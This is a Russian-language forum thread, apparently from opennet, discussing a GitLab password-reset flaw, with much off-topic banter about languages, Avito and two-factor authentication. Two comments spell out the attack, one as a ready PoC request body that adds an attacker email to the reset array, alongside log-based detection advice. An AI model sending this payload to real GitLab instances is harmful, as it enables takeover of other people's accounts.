| 1.1, Аноним (1), 11:31, 12/01/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +3 +/– |
> Проблема проявляется начиная с выпуска GitLab 16.1.0, в котором появилась возможность отправки кода восстановления пароля на неверифицированный запасной email-адрес.
> возможность отправки кода восстановления пароля на неверифицированный запасной email-адрес.
Господа эксперты, можете объяснить: как это вообще?
| | |
| |
| 2.3, Аноним (3), 12:06, 12/01/2024 [^] [^^] [^^^] [ответить]
| +10 +/– |
Это называется безопасность уровня "руби", есть ещё безопасность уровня "перл". Также существует безопасность уровня "пхп", там уже тёртые камаки.
| | |
| |
| |
| 4.8, Шарп (ok), 12:42, 12/01/2024 [^] [^^] [^^^] [ответить]
| +10 +/– |
 С сишкой сразу был бы root доступ к серверу, а не угон аккаунта в веб приложении.
| | |
| 4.34, Аноним (34), 16:17, 12/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> А с сишкой чо?
Сишка и безопасность — это параллельные миры. Которые, как мы знаем из геометрии, не пересекаются.
| | |
| |
| 5.53, fi (ok), 18:44, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
 это у вас остаточные знания школьной геометрии :DDD
возьмите кривизну пространства отличную от '0' - и много чего узнаете )))
| | |
| |
| 6.60, Аноним (34), 20:08, 12/01/2024 [^] [^^] [^^^] [ответить]
| +4 +/– | |
> это у вас остаточные знания школьной геометрии :DDD
Не пытайтесь выглядеть умнее, чем вы есть.
> возьмите кривизну пространства отличную от '0' - и много чего узнаете )))
Строгое понятие параллельности есть только в Евклидовой геометрии.
В геометрии Лобачевского есть асимптотическая параллельность. Асимптотически параллельные прямые тоже не пересекаются.
В сферической и Римановой геометрии понятие параллельности в принципе отсутствует.
| | |
|
|
|
| 3.14, Аноним (14), 14:18, 12/01/2024 [^] [^^] [^^^] [ответить]
| +2 +/– |
Самый безопасный уровень «раста» — там кода просто нет, соответственно ломать нечего.
| | |
| |
| 4.95, Самый Лучший Гусь (?), 02:20, 15/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Так говорят же что самый лучший код это такой код который не был написан. Если этот код был не написан на безопасном языке то это даже лучше чем если на какойто сишке или пхп
| | |
|
|
| 2.7, Аноним (7), 12:29, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
> Господа эксперты, можете объяснить: как это вообще?
ну типа тебя спрашивают (или даже не спрашивают но в недрах юзерпрофайла на стопиццотом этаже вложенности закопана возможность) - "дай запасной мэйл, а то вдруг основной у тебя сдохнет а пароль ты уже давно прое..." - и ты такой радостно - а НННА! otjebites@devnull.org
А выясняется что это реально существующий домен и владелец умеет получать письма на этот адрес!
Хренак - и твой летфпад теперь - его!
Кто бы мог подумать и было ли ему - вот вообще - чем?!
Поэтому теперь будешь подтверждать свои емели по паспорту, иначе хрен тебе а не возможность выкладывать свои лефтпады.
| | |
| |
| 3.58, Аноним (-), 20:01, 12/01/2024 [^] [^^] [^^^] [ответить]
| +5 +/– | |
> А выясняется что это реально существующий домен и владелец умеет получать письма на этот адрес!
А вот нифига.
Просто атакующий шлет запрос на восстановление не с одним мылом, а с массивом
[validDevEmail@mail.com, attakerMail@evil.com]
И все)
Думаю найти нужные почтовые адреса это дело техники.
| | |
|
| |
| 3.23, Аноним (-), 15:39, 12/01/2024 [^] [^^] [^^^] [ответить]
| +3 +/– | |
> Самое забавное, что, из всплывающих за многие месяцы на опеннете уязвимостей гитлаба.. ни одна не работала в гитхабе. По случайному, разумеется, совпадению.
Может они их нашли и починили раньше?
А может гитлаб пишут раки, причем ногами.
Если тут есть какая-то теория заговора, то я ее не уловил)
| | |
| |
| 4.36, Аноним (34), 16:19, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
> А может гитлаб пишут раки, причем ногами.
Ну, наверное, всё-таки люди, но пожалуй, действительно не вполне адекватные и квалифицированные (говорю по многолетнему опыту эксплуатации гитлаба, закончившейся переездом на gitea+argo).
| | |
|
| 3.42, Аноним (42), 16:54, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
А зачем упоминать номер телефона в акте Авито? Прищемили себе дверью, а потом жалуетесь?
| | |
| |
| 4.43, Бывалый смузихлёб (?), 17:03, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
> А зачем упоминать номер телефона в акте Авито? Прищемили себе дверью, а
> потом жалуетесь?
ну там... номер телефона кагбэ.. просиццо
Вообще-то, это уже далеко не основной, но весьма странная ситуация, когда контора не то чтобы восстанавливает старый акк( не надо ), но отказывается заблокировать старый и рассказывает сказки про комплексное подтверждение входа, которого, по факту, нет
| | |
| 4.45, Аноним (45), 18:19, 12/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– | |
Потому что долгое время это был основной идентификатор аккаунта. Не изолированная почта, не пара логин-пароль, а привязка к номеру. Естественно, номера собирались в базы, были сайты с коллекцией всех когда-либо размещённых объявлений по номеру, итд. Никакой приватности, но оно работало, было удобно и не создавало проблем.
Потом пришли эффективные менеджеры, и теперь авито безальтернативно просит мордой в вебку покрутить и паспорт прислать. И номер продавца теперь не узнать, чтобы прозвонить ему голосом. Всё взаимодействие только через сайт, а для сайта нужен аккаунт, а для аккаунта сливать авито персданные.
| | |
| |
| 5.55, Аноним (42), 19:06, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Ну так, может, не надо регистрироваться на мутных сайтах, если они требуют номер телефона?
| | |
| |
| 6.64, Аноним (-), 20:14, 12/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– |
А если все-таки хочется продать свой пентиум 3?
Или нужно поискать на барахолке память для своего коредвадуо, а бомжи около мусорки принимают тебя за конкурента?
Вот именно тогда люди регистрируются на всяких авитах.
| | |
| 6.88, Бывалый смузихлёб (?), 16:01, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
> Ну так, может, не надо регистрироваться на мутных сайтах, если они требуют
> номер телефона?
*шутка про не_мутные сайты с обилием предложений по товару, которые. притом, ничего не требуют и не спрашивают*
Как не в РФ живёшь, ейбогу
А номер телефона нынче требуется почти для всего вплоть до почты( уже лет 5 назад были большие сложности с регистрацией ящика на том же гугломейле без предоставления телефона. Даже если удалось, то быстро блочат "обнаружена подозрительная активность" и требуют предоставить номер, иначе - акк не разблокировать, ведь подозрительно )
| | |
| |
| 7.89, Аноним (34), 16:10, 13/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– |
Напомнило легендарный немецкий хостинг Contabo, который позволял зарегаться без скана паспорта.
Но, по удивительному совпадению, ровно через два месяца после регистрации у всех пользователей случалась "подозрительная активность", и для разблокировки аккаунта нужен был скан паспорта.
| | |
|
|
|
|
| 3.50, нах. (?), 18:35, 12/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– |
У меня еще веселей - симка давно сдохла, но залезть в авито решил я. Акаунту лет десять уже.
Телефон тогда еще не требовали с ножом к горлу, но он там был просто чтоб мне могли позвонить потенциальные покупатели.
И... опаньки - мы тебе прислали нужный и полезный смс, срочно введи оттуда кот. Да нам похрен что ты знаешь свой пароль, что тебе по прежнему принадлежит мэйл и что ты не просил такой "заботы" - кот давай.
И да, никакие действия недоступны, авите лудше знать как заботиться о твоей безопастносте.
| | |
| |
| 4.93, Аноньимъ (ok), 18:37, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
 У меня ещё ещё веселее.
Купил симку, активировал. Стал пользоваться.
И тут стали приходить смс о банковских операциях. О восстановлении доступа в фейсбук чи вконтакт.
Я по номеру то в фейсбук и зашёл, но не нашёл там способа связаться с владельцем и попросить его от..вязать потерянный номер от банковского аккаунта.
| | |
| |
| 5.94, анон (?), 00:15, 14/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Смени ему авку на картинку с текстом, который хочешь ему передать
| | |
| 5.96, нах. (?), 11:30, 18/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
ну фигле... я про вконтакт только знаю (потому что раз в три года все же вынужден пользоваться чтобы прочитать что-то зачем-то там помеченное "только для залогиненых", секьюрить, мля) - а сколько и чего у меня еще было попривязано к левым симкам - даже и не вспомнить уже.
И как его отвязать-то если симка уже не твоя? Просить тебя переслать код из смсочки?
Но в принципе можешь ему в фейсбуке на страничку нагадить, в предположении что он хотя бы помнит какой у него был номер, хотя... в некоторых странах уголовно наказуемо.
| | |
|
|
|
| 2.71, Аноним (71), 22:53, 12/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> Господа эксперты, можете объяснить: как это вообще?
Всё просто. Так всегда, если халтурят в угоду конъюктуре, вместо создания продукта.
Они ж работу с регулярками начинали два раза. Результат обоих попыток оставил чувство отторжения и желание перестать пользоваться.
Увы и ах. Ну такие они.
| | |
| |
| 3.75, Аноним (34), 01:58, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
> Всё просто. Так всегда, если халтурят в угоду конъюктуре, вместо создания продукта.
Обычный бизнес в IT. Можно подумать, Microsoft делал иначе.
| | |
| |
| 4.85, Аноним (71), 13:55, 13/01/2024 [^] [^^] [^^^] [ответить]
| +2 +/– | |
Обыденность зла. Всё так.
Сосед бандюк, выбивающий из должников ночами, может запросто зайти к соседу попросить по человески кончившейся соли. Будет добрый человек, сосед... А ночью выбивает...
И что, что другие так делают? Тоже так хочешь? Или хочешь назвать это хорошим, передёрнуть смыслы? А?
| | |
| |
| 5.92, Аноним (34), 17:22, 13/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– |
"Хорошая корпорация" — оксюморон.
Любая корпорация занимается добычей денег, и пути к этой цели уж точно не ограничиваются моралью. Только законом, да и то не всегда.
| | |
|
|
|
|
| |
| 2.28, Аноним (28), 15:59, 12/01/2024 [^] [^^] [^^^] [ответить]
| –1 +/– |
Они и на Раст со временем планируют перейти, в соответствии с рекомендациями NSA.
| | |
| |
| 3.37, Аноним (34), 16:21, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
NSA любит только сишку. Иначе может не получиться зайти с туза, а это очень важно для защиты демократии.
| | |
| 3.51, нах. (?), 18:36, 12/01/2024 [^] [^^] [^^^] [ответить]
| –1 +/– | |
чувак осторожней - там некий Хэнлон чота недобро улыбается и бритвой небезопасной помахивает в твою сторону.
| | |
|
|
| 1.6, Аноним (7), 12:26, 12/01/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +4 +/– | |
срачно внидряем стофакторную аутентификацию! С подтверждением нотариально заверенной копией паспорта!
| | |
| 1.12, Аноним (-), 13:22, 12/01/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
А сколько было аргументов в теме про обязательную двухфакторку.
С призывами "уходить на гитлаб"
Ну что? Ушли))?
| | |
| |
| |
| 3.24, Аноним (-), 15:41, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Не всплывают или их там нет?
Предположу второе, тк "майкрософт удаляет все упоминания о вулнах в гитхабе и убирает свидетелей" - это перебор дляже для мелкомягких)
| | |
| |
| 4.49, Аноним (34), 18:35, 12/01/2024 [^] [^^] [^^^] [ответить]
| +1 +/– |
Ну, как минимум, аудитить код gh сложнее, так как он не опенсорсный.
| | |
| |
| 5.56, Аноним (-), 19:57, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Если говорить про уязвимость из новости - то тут достаточно было UI.
Возможно разные настройки делали разные команды и возникла несогласованность.
Или какая-то новая фича перекрыла и испортила старую.
Вот бы была какая-то BIM система для разработки, как у строителей.
Чтобы ты ей "а добавлю я, от такую фичу", а она тебе "угу, поломаешь тут и вот тут, ну удачи лузер!".
| | |
| |
| 6.62, Аноним (34), 20:11, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
> Если говорить про уязвимость из новости - то тут достаточно было UI.
Где в интерфейсе восстановления пароля гитлаба ввести массив почт?
| | |
|
| |
| 6.74, Аноним (34), 01:56, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Белые хакеры вряд ли на такое заморачиваться будут, потому что статус весьма мутный.
А чёрные на станут публиковать инфу о дырах, у них другие методы заработка.
| | |
| |
| 7.78, Вы забыли заполнить поле Name (?), 02:11, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
> Белые хакеры вряд ли на такое заморачиваться будут, потому что статус весьма
> мутный.
> А чёрные на станут публиковать инфу о дырах, у них другие методы
> заработка.
Не понял про статус. Можно из кода скрафтить эксплойт и если он воспроизводится в проде, то бинго. Говорить откуда у тебя эксплойт не обязательно же.
| | |
|
|
|
|
|
| 2.33, Аноним (33), 16:14, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Ушёл. Сначала на GitLab, когда GH купила M$. Потом обратно, когда GitLab inc. решила, что ей всё можно. В след за ней M$ решила, что ей всё тоже можно - куда вы денетесь с подводной лодки. Ушёл на Codeberg.
| | |
| |
| 3.44, Аноним (34), 17:24, 12/01/2024 [^] [^^] [^^^] [ответить]
| +3 +/– |
Мыши плакали, кололись, но продолжали есть бесплатный сыр, несмотря на то, что к нему была привязана ниточка, позволяющая выдернуть его прямо из желудка бедной мышки.
| | |
|
| 2.48, Аноним (45), 18:34, 12/01/2024 [^] [^^] [^^^] [ответить]
| +2 +/– | |
Ты не путай тёплое с мягким.
Одно дело — обязательная двухфакторка. Через оффлайновые генераторы кодов, например.
Другое — идиотская привязка к номеру телефона, деанонимизирующая, но не защищающая абсолютно ни от чего.
И не надо подменять понятия. Обязательная двухфакторка — хорошо. Привязка к мобиле и паспорту — зло.
| | |
| |
| 3.59, Аноним (-), 20:07, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Это да, но в теме про двухфакторку PyPI куча анонов порвались.
Им даже FreeOTP, LinOTP, Authy, Google Authenticator не подходят.
А некоторые, особо долбанутые, начали рассказывать про злое FIDO (но не то) и токены которые за ними следят и "куда надо докладывают".
| | |
| |
| |
| 5.76, Аноним (34), 02:00, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
> у них бред преследования на почве unix way
Исправил опечатки.
| | |
|
|
|
|
| 1.15, Аноним (15), 14:38, 12/01/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Оно звучит страшнее, чем есть на самом деле. Как ты в учетку свой email то добавишь?
| | |
| |
| 2.22, пох. (?), 15:36, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
> Оно звучит страшнее, чем есть на самом деле. Как ты в учетку
> свой email то добавишь?
так чужой же надо добавлять!
| | |
| 2.46, анон (?), 18:24, 12/01/2024 [^] [^^] [^^^] [ответить]
| +6 +/– | |
Например так:
Можно переопределить почту в механизме восстановления пароля, передав специально сформированный запрос, в котором в нулевом элементе массива будет валидный email, а в следующем - злоумышленника.
PoC:
user[email][]=valid@email.com&user[email][]=attacker@email.com
Для проверки фактов компрометации систем предлагается оценить в логе gitlab-rails/production_json.log наличие HTTP-запросов к обработчику /users/password с указанием массива из нескольких email в параметре "'params.value.email'". Также предлагается проверить наличие в логе gitlab-rails/audit_json.log записей со значением PasswordsController#create в meta.caller.id и указанием массива из нескольких адресов в блоке target_details. Атака не может быть доведена до конца при включении пользователем двухфакторной аутентификации.
| | |
| |
| 3.61, Аноним (-), 20:09, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
О наконец-то кто-то пришел и нормально объяснил.
Если оно действительно так работает, то это фейл просто эпичнеший.
И было бы неплохо добавить пояснение в статью.
| | |
|
|
| 1.31, Аноним (28), 16:10, 12/01/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
Хммм, неужели уязвимости бывают не только из-за ошибок управления памятью? Не может быть!
| | |
| |
| 2.47, Аноним (34), 18:33, 12/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
Ну а что делать, если в языке нет встроенных механизмов, позволяющих выстрелить себе в ногу?
Приходится изобретать пистолет и патроны.
| | |
|
| |
| |
| 3.84, Аноним (71), 13:51, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– | |
Да и на здоровье.
Утверждение о том, что такие компании людей дают такой результат.
Т.е. не надо пользоваться продуктами людей с такими свойствами, если хочешь пользоваться хорошим. Т.к. у них не было основной целью седлать норм. и отл. софт для CI, а делали они совсем другое.
| | |
| |
| 4.86, Аноним (71), 13:57, 13/01/2024 [^] [^^] [^^^] [ответить]
| +/– |
А остальным только показалось, что на халяву дают CI комбайн с жёстко прибитыми гвоздями фичами и Git.
| | |
|
|
|
|
